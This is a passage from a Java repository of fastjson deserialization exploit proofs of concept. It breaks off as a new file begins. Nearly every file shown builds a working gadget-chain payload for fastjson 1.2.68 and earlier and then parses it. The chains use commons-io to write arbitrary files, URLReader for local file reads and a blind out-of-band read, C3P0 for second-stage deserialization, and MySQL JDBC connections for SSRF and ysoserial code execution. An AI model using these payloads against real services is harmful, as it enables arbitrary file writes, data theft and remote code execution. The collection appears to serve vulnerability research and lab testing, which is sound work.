55 |         		+ "    \"trigger2\":{\r\n"
56 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
57 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
58 |         		+ "      \"is\":{\r\n"
59 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
60 |         		+ "        \"input\":{\r\n"
61 |         		+ "          \"$ref\":\"$.input\"\r\n"
62 |         		+ "        },\r\n"
63 |         		+ "        \"branch\":{\r\n"
64 |         		+ "          \"$ref\":\"$.branch\"\r\n"
65 |         		+ "        },\r\n"
66 |         		+ "        \"closeBranch\": true\r\n"
67 |         		+ "      },\r\n"
68 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
69 |         		+ "      \"lenient\":false,\r\n"
70 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
71 |         		+ "    },\r\n"
72 |         		+ "    \"trigger3\":{\r\n"
73 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
74 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
75 |         		+ "      \"is\":{\r\n"
76 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
77 |         		+ "        \"input\":{\r\n"
78 |         		+ "          \"$ref\":\"$.input\"\r\n"
79 |         		+ "        },\r\n"
80 |         		+ "        \"branch\":{\r\n"
81 |         		+ "          \"$ref\":\"$.branch\"\r\n"
82 |         		+ "        },\r\n"
83 |         		+ "        \"closeBranch\": true\r\n"
84 |         		+ "      },\r\n"
85 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
86 |         		+ "      \"lenient\":false,\r\n"
87 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
88 |         		+ "    }\r\n"
89 |         		+ "  }\r\n"
90 |         		+ "}\r\n"
91 |         		+ "";
92 |         System.out.println(payload);
93 |         JSON.parse(payload);	
94 |     }
95 | }
96 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson06_io_write_2.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson06_io_write_2 {
 6 |     public static void main(String[] args) throws Exception {
 7 |     	//<=1.2.68 and commons-io-2.7/2.8
 8 |     	String code = "test";
 9 |         for (int i = 0; i < 8200; i++) {
10 | 			code += "a";
11 | 		}
12 |     	String payload = "{\r\n"
13 |         		+ "  \"x\":{\r\n"
14 |         		+ "    \"@type\":\"com.alibaba.fastjson.JSONObject\",\r\n"
15 |         		+ "    \"input\":{\r\n"
16 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
17 |         		+ "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
18 |         		+ "      \"reader\":{\r\n"
19 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
20 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n"
21 |         		+ "        \"start\":0,\r\n"
22 |         		+ "        \"end\":2147483647\r\n"
23 |         		+ "      },\r\n"
24 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
25 |         		+ "      \"bufferSize\":1024\r\n"
26 |         		+ "    },\r\n"
27 |         		+ "    \"branch\":{\r\n"
28 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
29 |         		+ "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
30 |         		+ "      \"writer\":{\r\n"
31 |         		+ "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
32 |         		+ "        \"file\":\"1.txt\",\r\n"
33 |         		+ "        \"charsetName\":\"UTF-8\",\r\n"
34 |         		+ "        \"append\": false\r\n"
35 |         		+ "      },\r\n"
36 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
37 |         		+ "      \"bufferSize\": 1024,\r\n"
38 |         		+ "      \"writeImmediately\": true\r\n"
39 |         		+ "    },\r\n"
40 |         		+ "    \"trigger\":{\r\n"
41 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
42 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
43 |         		+ "      \"inputStream\":{\r\n"
44 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
45 |         		+ "        \"input\":{\r\n"
46 |         		+ "          \"$ref\":\"$.input\"\r\n"
47 |         		+ "        },\r\n"
48 |         		+ "        \"branch\":{\r\n"
49 |         		+ "          \"$ref\":\"$.branch\"\r\n"
50 |         		+ "        },\r\n"
51 |         		+ "        \"closeBranch\": true\r\n"
52 |         		+ "      },\r\n"
53 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
54 |         		+ "      \"lenient\":false,\r\n"
55 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
56 |         		+ "    },\r\n"
57 |         		+ "    \"trigger2\":{\r\n"
58 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
59 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
60 |         		+ "      \"inputStream\":{\r\n"
61 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
62 |         		+ "        \"input\":{\r\n"
63 |         		+ "          \"$ref\":\"$.input\"\r\n"
64 |         		+ "        },\r\n"
65 |         		+ "        \"branch\":{\r\n"
66 |         		+ "          \"$ref\":\"$.branch\"\r\n"
67 |         		+ "        },\r\n"
68 |         		+ "        \"closeBranch\": true\r\n"
69 |         		+ "      },\r\n"
70 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
71 |         		+ "      \"lenient\":false,\r\n"
72 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
73 |         		+ "    },\r\n"
74 |         		+ "    \"trigger3\":{\r\n"
75 |         		+ "      \"@type\":\"java.lang.AutoCloseable\",\r\n"
76 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
77 |         		+ "      \"inputStream\":{\r\n"
78 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
79 |         		+ "        \"input\":{\r\n"
80 |         		+ "          \"$ref\":\"$.input\"\r\n"
81 |         		+ "        },\r\n"
82 |         		+ "        \"branch\":{\r\n"
83 |         		+ "          \"$ref\":\"$.branch\"\r\n"
84 |         		+ "        },\r\n"
85 |         		+ "        \"closeBranch\": true\r\n"
86 |         		+ "      },\r\n"
87 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
88 |         		+ "      \"lenient\":false,\r\n"
89 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
90 |         		+ "    }\r\n"
91 |         		+ "  }\r\n"
92 |         		+ "}";
93 |         System.out.println(payload);
94 |         JSON.parse(payload);	
95 |     }
96 | }
97 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson07_io_write_3.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | import org.apache.commons.io.FileUtils;
  5 | import java.io.File;
  6 | import java.io.IOException;
  7 | 
  8 | /**
  9 |  * fastjson 1.2.68 autocloseable commons-io<=2.4 poc 生成工具类
 10 |  *
 11 |  * @author su18
 12 |  */
 13 | public class Fastjson07_io_write_3 {
 14 | 	//<=1.2.68 and commons-io
 15 | 	public static final String AUTOCLOSEABLE_TAG = "\"@type\":\"java.lang.AutoCloseable\",";
 16 | 	/**
 17 | 	 * 在 payload 外包裹一层绕过指定类型
 18 | 	 *
 19 | 	 * @param payload payload
 20 | 	 * @return 返回结果
 21 | 	 */
 22 | 	public static String bypassSpecializedClass(String payload) {
 23 | 		return "{\"su18\":" + payload + "}";
 24 | 	}
 25 | 	/**
 26 | 	 * 使用 Currency 类解析调用 "currency" 中 value 的 toString 方法，使用 JSONObject 方法调用 toJSONString
 27 | 	 *
 28 | 	 * @param payload payload
 29 | 	 * @return 返回结果
 30 | 	 */
 31 | 	public static String useCurrencyTriggerAllGetter(String payload, boolean ref) {
 32 | 		return String.format("{\"@type\":\"java.util.Currency\",\"val\":{\"currency\":%s%s}}%s",
 33 | 				(ref ? "" : "{\"su19\":"), payload, (ref ? "" : "}"));
 34 | 	}
 35 | 
 36 | 
 37 | 	/**
 38 | 	 * 生成 CharSequenceInputStream 反序列化字符串
 39 | 	 *
 40 | 	 * @param content 写入内容
 41 | 	 * @param ref     是否使用引用对象
 42 | 	 * @return 返回结果
 43 | 	 */
 44 | 	public static String generateCharSequenceInputStream(String content, boolean ref) {
 45 | 		int mod = 8192 - content.length() % 8192;
 46 | 
 47 | 		StringBuilder contentBuilder = new StringBuilder(content);
 48 | 		for (int i = 0; i < mod+1; i++) {
 49 | 			contentBuilder.append(" ");
 50 | 		}
 51 | 
 52 | 		return String.format("{%s\"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\"," +
 53 | 						"\"charset\":\"UTF-8\",\"bufferSize\":4,\"s\":{\"@type\":\"java.lang.String\"\"%s\"}",
 54 | 				ref ? AUTOCLOSEABLE_TAG : "", contentBuilder);
 55 | 	}
 56 | 
 57 | 
 58 | 	/**
 59 | 	 * 生成 FileWriterWithEncoding 反序列化字符串
 60 | 	 *
 61 | 	 * @param filePath 要写入的文件位置
 62 | 	 * @param ref      是否使用引用对象
 63 | 	 * @return 返回结果
 64 | 	 */
 65 | 	public static String generateFileWriterWithEncoding(String filePath, boolean ref) {
 66 | 		return String.format("{%s\"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\"," +
 67 | 				"\"file\":\"%s\",\"encoding\":\"UTF-8\"}", ref ? AUTOCLOSEABLE_TAG : "", filePath);
 68 | 	}
 69 | 
 70 | 	/**
 71 | 	 * 生成 WriterOutputStream 反序列化字符串
 72 | 	 *
 73 | 	 * @param writer writer 对象反序列化字符串
 74 | 	 * @param ref    是否使用引用对象
 75 | 	 * @return 返回结果
 76 | 	 */
 77 | 	public static String generateWriterOutputStream(String writer, boolean ref) {
 78 | 		return String.format("{%s\"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\"writeImmediately\":true," +
 79 | 						"\"bufferSize\":4,\"charsetName\":\"UTF-8\",\"writer\":%s}",
 80 | 				ref ? AUTOCLOSEABLE_TAG : "", writer);
 81 | 	}
 82 | 
 83 | 
 84 | 	/**
 85 | 	 * 生成 TeeInputStream 反序列化字符串
 86 | 	 *
 87 | 	 * @param inputStream  inputStream 类
 88 | 	 * @param outputStream outputStream 类
 89 | 	 * @param ref          是否使用引用对象
 90 | 	 * @return 返回结果
 91 | 	 */
 92 | 	public static String generateTeeInputStream(String inputStream, String outputStream, boolean ref) {
 93 | 		return String.format("{%s\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":%s," +
 94 | 				"\"closeBranch\":true,\"branch\":%s}", ref ? AUTOCLOSEABLE_TAG : "", inputStream, outputStream);
 95 | 	}
 96 | 
 97 | 
 98 | 	/**
 99 | 	 * 生成 BOMInputStream 反序列化字符串
100 | 	 *
101 | 	 * @param inputStream inputStream 类
102 | 	 * @param size        读取 byte 大小
103 | 	 * @return 返回结果
104 | 	 */
105 | 	public static String generateBOMInputStream(String inputStream, int size) {
106 | 
107 | 		int nums = size / 8192;
108 | 		int mod  = size % 8192;
109 | 
110 | 		if (mod != 0) {
111 | 			nums = nums + 1;
112 | 		}
113 | 
114 | 		StringBuilder bytes = new StringBuilder("0");
115 | 		for (int i = 0; i < nums * 8192; i++) {
116 | 			bytes.append(",0");
117 | 		}
118 | 		return String.format("{%s\"@type\":\"org.apache.commons.io.input.BOMInputStream\",\"delegate\":%s," +
119 | 						"\"boms\":[{\"charsetName\":\"UTF-8\",\"bytes\":[%s]}]}",
120 | 				AUTOCLOSEABLE_TAG, inputStream, bytes);
121 | 	}
122 | 
123 | 
124 | 	/**
125 | 	 * 读取文件内容字符串
126 | 	 *
127 | 	 * @param file 文件路径
128 | 	 * @return 返回字符串
129 | 	 */
130 | 	public static String readFile(File file) {
131 | 		String result = "";
132 | 
133 | 		try {
134 | 			result = FileUtils.readFileToString(file);
135 | 		} catch (IOException e) {
136 | 			e.printStackTrace();
137 | 		}
138 | 
139 | 		return result;
140 | 	}
141 | 
142 | 
143 | 	/**
144 | 	 * 生成普通 payload
145 | 	 *
146 | 	 * @param payloadFile    写入文件本地存储位置
147 | 	 * @param targetFilePath 写出目标文件位置
148 | 	 * @return 返回 payload
149 | 	 */
150 | 	public static String generatePayload(String payloadFile, String targetFilePath) {
151 | 		File   file        = new File(payloadFile);
152 | 		String fileContent = readFile(file);
153 | 		if (!"".equals(fileContent)) {
154 | 			return bypassSpecializedClass(
155 | 					useCurrencyTriggerAllGetter(
156 | 							generateBOMInputStream(
157 | 									generateTeeInputStream(generateCharSequenceInputStream(fileContent, false),
158 | 											generateWriterOutputStream(
159 | 													generateFileWriterWithEncoding(targetFilePath, false),
160 | 													false),
161 | 											false),
162 | 									(int) file.length()),
163 | 							false));
164 | 		}
165 | 
166 | 		return "";
167 | 	}
168 | 
169 | 	/**
170 | 	 * 生成引用型 payload
171 | 	 *
172 | 	 * @param payloadFile    写入文件本地存储位置
173 | 	 * @param targetFilePath 写出目标文件位置
174 | 	 * @return 返回 payload
175 | 	 */
176 | 	public static String generateRefPayload(String payloadFile, String targetFilePath) {
177 | 		File   file        = new File(payloadFile);
178 | 		String fileContent = readFile(file);
179 | 		if (!"".equals(fileContent)) {
180 | 			return bypassSpecializedClass(
181 | 					useCurrencyTriggerAllGetter(
182 | 							"{\"writer\":" + generateFileWriterWithEncoding(targetFilePath, true) +
183 | 									",\"outputStream\":" + generateWriterOutputStream("{\"$ref\":\"$.currency.writer\"}", true) +
184 | 									",\"charInputStream\":" + generateCharSequenceInputStream(fileContent, true) +
185 | 									",\"teeInputStream\":" + generateTeeInputStream("{\"$ref\":\"$.currency.charInputStream\"}", "{\"$ref\":\"$.currency.outputStream\"}", true) +
186 | 									",\"inputStream\":" + generateBOMInputStream("{\"$ref\":\"$.currency.teeInputStream\"}", (int) file.length()) + "}"
187 | 							, true
188 | 					)
189 | 			);
190 | 		}
191 | 
192 | 		return "";
193 | 
194 | 	}
195 | 
196 | 
197 | 	public static void main(String[] args) {
198 | 		String file   = "1.txt";
199 | 		String target = "2.txt";
200 | 
201 | 		// 正常调用 payload 生成
202 | 		String payload = generatePayload(file, target);
203 | 
204 | 		// 引用类型 payload 生成
205 | 		String payloadWithRef = generateRefPayload(file, target);
206 | 		System.out.println(payloadWithRef);
207 | //		以下三种调用方式均可兼容，触发反序列化
208 | //		JSON.parse(payloadWithRef);
209 | 		JSON.parseObject(payloadWithRef);
210 | //		JSON.parseObject(payloadWithRef,POC.class);
211 | 	}
212 | 
213 | }
214 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson08_io_write_4.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import java.util.Base64;
 3 | import java.io.InputStream;
 4 | import java.net.URL;
 5 | import java.util.Arrays;
 6 | import com.alibaba.fastjson.JSON;
 7 | 
 8 | public class Fastjson08_io_write_4 {
 9 | 	public static void main(String[] args) throws Exception {
10 | 		//<=1.2.68 and commons-io-2.2 aspectjtools-1.9.6 commons-codec-1.6
11 | 		//这条链主要是为了解决1-3的io链无法写入复杂文件结构，文件依旧需要大于8kb才能写入
12 | 		String url = "file://1.txt";
13 | 		InputStream input = new URL(url).openStream();
14 | 		byte[] bs = new byte[input.available()];
15 | 		input.read(bs);
16 | 		String test = Base64.getEncoder().encodeToString(bs);
17 | 		byte[] testbs = test.getBytes();
18 | 		String payload = "{\r\n"
19 | 				+ "  \"@type\":\"java.lang.AutoCloseable\",\r\n"
20 | 				+ "  \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
21 | 				+ "  \"delegate\":{\r\n"
22 | 				+ "    \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
23 | 				+ "    \"input\":{\r\n"
24 | 				+ "      \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n"
25 | 				+ "      \"in\":{\r\n"
26 | 				+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
27 | 				+ "        \"charset\":\"utf-8\",\r\n"
28 | 				+ "        \"bufferSize\": 1024,\r\n"
29 | 				+ "        \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n"
30 | 				+ "      },\r\n"
31 | 				+ "      \"doEncode\":false,\r\n"
32 | 				+ "      \"lineLength\":1024,\r\n"
33 | 				+ "      \"lineSeparator\":\"5ZWKCg==\",\r\n"
34 | 				+ "      \"decodingPolicy\":0\r\n"
35 | 				+ "    },\r\n"
36 | 				+ "    \"branch\":{\r\n"
37 | 				+ "      \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n"
38 | 				+ "      \"targetPath\":\"./1.txt\"\r\n"
39 | 				+ "    },\r\n"
40 | 				+ "    \"closeBranch\":true\r\n"
41 | 				+ "  },\r\n"
42 | 				+ "  \"include\":true,\r\n"
43 | 				+ "  \"boms\":[{\r\n"
44 | 				+ "                  \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
45 | 				+ "                  \"charsetName\": \"UTF-8\",\r\n"
46 | 				+ "                  \"bytes\":"+Arrays.toString(testbs)+"\r\n"
47 | 				+ "                }],\r\n"
48 | 				+ "  \"x\":{\"$ref\":\"$.bOM\"}\r\n"
49 | 				+ "}\r\n"
50 | 				+ "";
51 | 
52 | 		System.out.println(payload);
53 | 		JSON.parseObject(payload);
54 | 
55 | 	}
56 | }
57 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson09_io_read.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import java.io.InputStream;
 4 | import java.net.URL;
 5 | import java.util.Arrays;
 6 | import com.alibaba.fastjson.JSON;
 7 | 
 8 | public class Fastjson09_io_read {
 9 |     public static void main(String[] args) throws Exception {
10 |     	//<=1.2.68 and commons-io
11 |     	String url = "file:///D:/";
12 |     	InputStream input = new URL(url).openStream();
13 |         byte[] bs = new byte[input.available()];
14 |         input.read(bs);
15 |         System.out.println(Arrays.toString(bs));
16 |         System.out.println(new String(bs));
17 |     	String payload = "{\r\n"
18 |     			+ "    \"abc\": {\r\n"
19 |     			+ "        \"@type\": \"java.lang.AutoCloseable\",\r\n"
20 |     			+ "        \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
21 |     			+ "        \"delegate\": {\r\n"
22 |     			+ "            \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
23 |     			+ "            \"reader\": {\r\n"
24 |     			+ "                \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
25 |     			+ "                \"url\": \""+url+"\"\r\n"
26 |     			+ "            },\r\n"
27 |     			+ "            \"charsetName\": \"UTF-8\",\r\n"
28 |     			+ "            \"bufferSize\": 1024\r\n"
29 |     			+ "        },\r\n"
30 |     			+ "        \"boms\": [{\r\n"
31 |     			+ "            \"charsetName\": \"UTF-8\",\r\n"
32 |     			+ "            \"bytes\": [36]\r\n"
33 |     			+ "        },{\r\n"
34 |     			+ "            \"charsetName\": \"UTF-8\",\r\n"
35 |     			+ "            \"bytes\": [49]\r\n"
36 |     			+ "        }]\r\n"
37 |     			+ "    },\r\n"
38 |     			+ "    \"address\": {\r\n"
39 |     			+ "        \"$ref\": \"$.abc.BOM\"\r\n"
40 |     			+ "    }\r\n"
41 |     			+ "}";
42 |     	System.out.println(payload);
43 |     	System.out.println(JSON.parseObject(payload));
44 |     }
45 | }
46 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson10_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import java.io.InputStream;
 4 | import java.net.URL;
 5 | import java.util.Arrays;
 6 | 
 7 | import com.alibaba.fastjson.JSON;
 8 | 
 9 | public class Fastjson10_io_read_error_dnslog {
10 |     public static void main(String[] args) throws Exception {
11 |     	//<=1.2.68 and commons-io
12 |     	String url = "file:///D://";
13 |     	InputStream input = new URL(url).openStream();
14 |         byte[] bs = new byte[input.available()];
15 |         input.read(bs);
16 |         System.out.println(Arrays.toString(bs));
17 |         System.out.println(new String(bs));
18 |     	String payload = "{\r\n"
19 |     			+ "      \"abc\":{\"@type\": \"java.lang.AutoCloseable\",\r\n"
20 |     			+ "        \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
21 |     			+ "        \"delegate\": {\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
22 |     			+ "          \"reader\": { \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
23 |     			+ "            \"url\": \"file:///D://\"\r\n"
24 |     			+ "          },\r\n"
25 |     			+ "          \"charsetName\": \"UTF-8\",\r\n"
26 |     			+ "          \"bufferSize\": 1024\r\n"
27 |     			+ "        },\"boms\": [\r\n"
28 |     			+ "          {\r\n"
29 |     			+ "            \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
30 |     			+ "            \"charsetName\": \"UTF-8\",\r\n"
31 |     			+ "            \"bytes\": [37]\r\n"
32 |     			+ "          }\r\n"
33 |     			+ "        ]\r\n"
34 |     			+ "      },\r\n"
35 |     			+ "      \"address\" : {\"@type\": \"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
36 |     			+ "                  \"charSequence\": {\"@type\": \"java.lang.String\"{\"$ref\":\"$.abc.BOM[0]\"},\"start\": 0,\"end\": 0},\r\n"
37 |     			+ "      \"xxx\": {\r\n"
38 |     			+ "          \"@type\": \"java.lang.AutoCloseable\",\r\n"
39 |     			+ "          \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
40 |     			+ "          \"delegate\": {\r\n"
41 |     			+ "            \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
42 |     			+ "            \"reader\": {\r\n"
43 |     			+ "              \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
44 |     			+ "              \"url\": \"http://127.0.0.1:5667/\"\r\n"
45 |     			+ "              },\r\n"
46 |     			+ "            \"charsetName\": \"UTF-8\",\r\n"
47 |     			+ "            \"bufferSize\": 1024\r\n"
48 |     			+ "          },\r\n"
49 |     			+ "          \"boms\": [{\"@type\": \"org.apache.commons.io.ByteOrderMark\", \"charsetName\": \"UTF-8\", \"bytes\": [1]}]\r\n"
50 |     			+ "      },\r\n"
51 |     			+ "      \"zzz\":{\"$ref\":\"$.xxx.BOM[0]\"}\r\n"
52 |     			+ "}\r\n"
53 |     			+ "";
54 |     	System.out.println(payload);
55 |     	JSON.parseObject(payload);
56 |     }
57 | }
58 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson11_C3P0.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import java.io.*;
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson11_C3P0 {
 6 |     public static void main(String[] args) throws Exception{
 7 |         InputStream in = new FileInputStream("D:\\Downloads\\workspace\\javareadobject\\1.ser");
 8 |         byte[] payload = toByteArray(in);
 9 |         String payloadHex = bytesToHex(payload, payload.length);
10 |         //C3P0 二次反序列化
11 |         String poc = "{\r\n"
12 |                 + "    \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \r\n"
13 |                 + "    \"userOverridesAsString\": \"HexAsciiSerializedMap:"+payloadHex+";\"\r\n"
14 |                 + "}";
15 |         //<1.2.48 and C3P0 二次反序列化
16 | //        poc = "{\r\n"
17 | //        		+ "    \"a\": {\r\n"
18 | //        		+ "        \"@type\": \"java.lang.Class\", \r\n"
19 | //        		+ "        \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\r\n"
20 | //        		+ "    }, \r\n"
21 | //        		+ "    \"b\": {\r\n"
22 | //        		+ "        \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \r\n"
23 | //        		+ "        \"userOverridesAsString\": \"HexAsciiSerializedMap:"+payloadHex+";\"\r\n"
24 | //        		+ "    }\r\n"
25 | //        		+ "}";
26 |         System.out.println(poc);
27 |         JSON.parseObject(poc);
28 |     }
29 |     public static byte[] toByteArray(InputStream in) throws IOException {
30 |         byte[] bytes = new byte[in.available()];
31 |         in.read(bytes);
32 |         in.close();
33 |         return bytes;
34 |     }
35 |     public static String bytesToHex(byte[] bArray, int length) {
36 |         StringBuffer sb = new StringBuffer(length);
37 | 
38 |         for(int i = 0; i < length; ++i) {
39 |             String sTemp = Integer.toHexString(255 & bArray[i]);
40 |             if (sTemp.length() < 2) {
41 |                 sb.append(0);
42 |             }
43 | 
44 |             sb.append(sTemp.toUpperCase());
45 |         }
46 |         return sb.toString();
47 |     }
48 | }
49 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson12_mysql_1.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson12_mysql_1 {
 6 |   	//<=1.2.68 and mysql 5.0.2-5.1.5 仅SSRF
 7 |     public static void main(String[] args) throws Exception{
 8 |         String payload = "{\r\n"
 9 |         		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
10 |         		+ "	\"@type\": \"com.mysql.jdbc.ReplicationConnection\",\r\n"
11 |         		+ "	\"masterProperties\": {\r\n"
12 |         		+ "		\"HOST\": \"127.0.0.1\",\r\n"
13 |         		+ "		\"user\": \"yso_CommonsCollections4_calc\",\r\n"
14 |         		+ "		\"password\": \"pass\",\r\n"
15 |         		+ "		\"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
16 |         		+ "		\"autoDeserialize\": \"true\"\r\n"
17 |         		+ "	},\r\n"
18 |         		+ "	\"slaveProperties\": {\r\n"
19 |         		+ "		\"HOST\": \"127.0.0.1\",\r\n"
20 |         		+ "		\"user\": \"yso_CommonsCollections4_calc\",\r\n"
21 |         		+ "		\"password\": \"pass\",\r\n"
22 |         		+ "		\"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
23 |         		+ "		\"autoDeserialize\": \"true\"\r\n"
24 |         		+ "	}\r\n"
25 |         		+ "}\r\n"
26 |         		+ "";
27 |         System.out.println(payload);
28 |     	JSON.parseObject(payload);
29 |     }
30 | }
31 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson13_mysql_2.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson13_mysql_2 {
 6 |   	//<=1.2.68 and mysql 5.1.1-5.1.49可SSRF 5.1.11至5.1.48可反序列化 
 7 |     public static void main(String[] args) throws Exception{
 8 |         String payload = "{\r\n"
 9 |         		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
10 |         		+ "	\"@type\": \"com.mysql.jdbc.JDBC4Connection\",\r\n"
11 |         		+ "	\"hostToConnectTo\": \"127.0.0.1\",\r\n"
12 |         		+ "	\"portToConnectTo\": 3306,\r\n"
13 |         		+ "	\"info\": {\r\n"
14 |         		+ "		\"user\": \"yso_CommonsCollections4_calc\",\r\n"
15 |         		+ "		\"password\": \"pass\",\r\n"
16 |         		+ "		\"statementInterceptors\": \"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
17 |         		+ "		\"autoDeserialize\": \"true\",\r\n"
18 |         		+ "		\"NUM_HOSTS\": \"1\"\r\n"
19 |         		+ "	},\r\n"
20 |         		+ "	\"databaseToConnectTo\": \"dbname\",\r\n"
21 |         		+ "	\"url\": \"\"\r\n"
22 |         		+ "}\r\n"
23 |         		+ "";
24 |         System.out.println(payload);
25 |     	JSON.parseObject(payload);
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson14_mysql_3.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson14_mysql_3 {
 6 |   	//<=1.2.68 and mysql 6.0.2-6.0.3可反序列化 
 7 |     public static void main(String[] args) throws Exception{
 8 |         String payload = "{\r\n"
 9 |         		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
10 |         		+ "	\"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection\",\r\n"
11 |         		+ "	\"proxy\": {\r\n"
12 |         		+ "		\"connectionString\": {\r\n"
13 |         		+ "			\"url\": \"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc\"\r\n"
14 |         		+ "		}\r\n"
15 |         		+ "	}\r\n"
16 |         		+ "}\r\n"
17 |         		+ "";
18 |         System.out.println(payload);
19 |     	JSON.parseObject(payload);
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson15_mysql_4.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson15_mysql_4 {
 6 |   	//<=1.2.68 and mysql 8.0.19可反序列化 >8.0.19可SSRF
